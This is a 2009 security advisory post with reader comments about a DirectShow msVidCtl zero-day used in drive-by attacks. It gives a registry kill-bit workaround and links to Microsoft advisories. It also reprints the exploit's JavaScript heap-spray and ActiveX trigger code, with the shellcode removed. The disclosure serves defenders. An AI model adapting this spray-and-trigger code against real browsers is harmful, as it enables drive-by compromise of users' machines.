0-day in Microsoft DirectShow (msvidctl.dll) used in drive-by attacks
A 0-day exploit within the msVidCtl component of Microsoft DirectShow is actively being exploited through drive-by attacks using thousands of newly compromised web sites, according to CSIS. The code has been published in the public domain via a number of Chinese web sites.
Please keep a watchful eye on your AV and IDS/IPS vendors updates to ensure coverage as early as possible on this exploit as it is likely to be widely deployed with the code being available.
A valid work around for the attack vector is available which set's the kill bit on the vulnerable DLL.
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerActiveX Compatibility{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400
Details of the exploit are available on the CSIS web site, but are included below:
var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
[SHELL CODE REMOVED]
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length<slackspace)
omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000)
shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;
memory=new Array();
for(x=0;x<300;x++)
memory[x]=shuishiMVP+dashell;
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
UPDATE July 6, 2009 19:00 UTC
Microsoft have released an advisory for the exploit, it can be found here :
http://www.microsoft.com/technet/security/advisory/972890.mspx
In addition, they have published a number of blog entries to cover their user base:
http://blogs.technet.com/msrc/default.aspx
http://www.microsoft.com/technet/security/advisory/default.mspx
http://blogs.technet.com/srd/
Comments
Elton
Jul 6th 2009
1 decade ago
Stephen
Jul 6th 2009
1 decade ago
Can We Get The English Version For The Same
hcbhatt
Jul 6th 2009
1 decade ago
http://translate.google.com/translate?prev=hp&hl=en&js=n&u=http%3A%2F%2Fwww.csis.dk%2Fdk%2Fnyheder%2Fnyheder.asp%3FtekstID%3D799&sl=da&tl=en&history_state0=
Stephen
Jul 6th 2009
1 decade ago
Can We Get The English Version For The Same
hcbhatt
Jul 6th 2009
1 decade ago
hcbhatt
Jul 6th 2009
1 decade ago
hcbhatt
Jul 6th 2009
1 decade ago
http://www.microsoft.com/technet/security/advisory/972890.mspx
This is still an early notice, but includes 45 CLASSIDs for this control, which they do not believe are designed to be exposed via Internet Explorer and thus should be safe to killbit.
Andrew from Vancouver
Jul 6th 2009
1 decade ago